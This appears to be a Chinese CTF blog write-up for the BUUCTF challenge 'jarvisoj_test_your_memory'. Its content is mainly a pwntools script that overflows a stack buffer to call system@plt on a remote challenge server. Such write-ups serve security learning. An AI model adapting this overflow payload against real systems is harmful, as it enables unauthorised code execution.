jarvisoj_test_your_memory

我会带着你远行 2023-02-22 10:51 24阅读 0赞

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg_size_16_color_FFFFFF_t_70]  
`我终于把buuctf这个平台上所有1分的pwn给刷完了....我以为后面都会是堆的题目，但是很明显这道题是栈的.....`  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg_size_16_color_FFFFFF_t_70 1]

from pwn import *
    
    context.log_level = 'debug'
    
    proc_name = './memory'
    p = process(proc_name)
    p = remote('node3.buuoj.cn', 29878)
    elf = ELF(proc_name)
    system_plt = elf.plt['system']
    main_addr = elf.sym['main']
    payload = b'a' * (0x13 + 4) + p32(system_plt) + p32(main_addr) + p32(0x80487e0)
    # p.recv() 本地和远程不太一样 本地把这条语句打开 
    p.sendline(payload)
    p.recv()
    p.recv()

![在这里插入图片描述][20200703010826476.png]

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg_size_16_color_FFFFFF_t_70]: https://img-blog.csdnimg.cn/20200703003732143.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg==,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg_size_16_color_FFFFFF_t_70 1]: https://img-blog.csdnimg.cn/20200703004240351.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80MzgzMzY0Mg==,size_16,color_FFFFFF,t_70
[20200703010826476.png]: https://img-blog.csdnimg.cn/20200703010826476.png

jarvisoj_test_your_memory

发表评论取消回复

还没有评论，来说两句吧...

相关阅读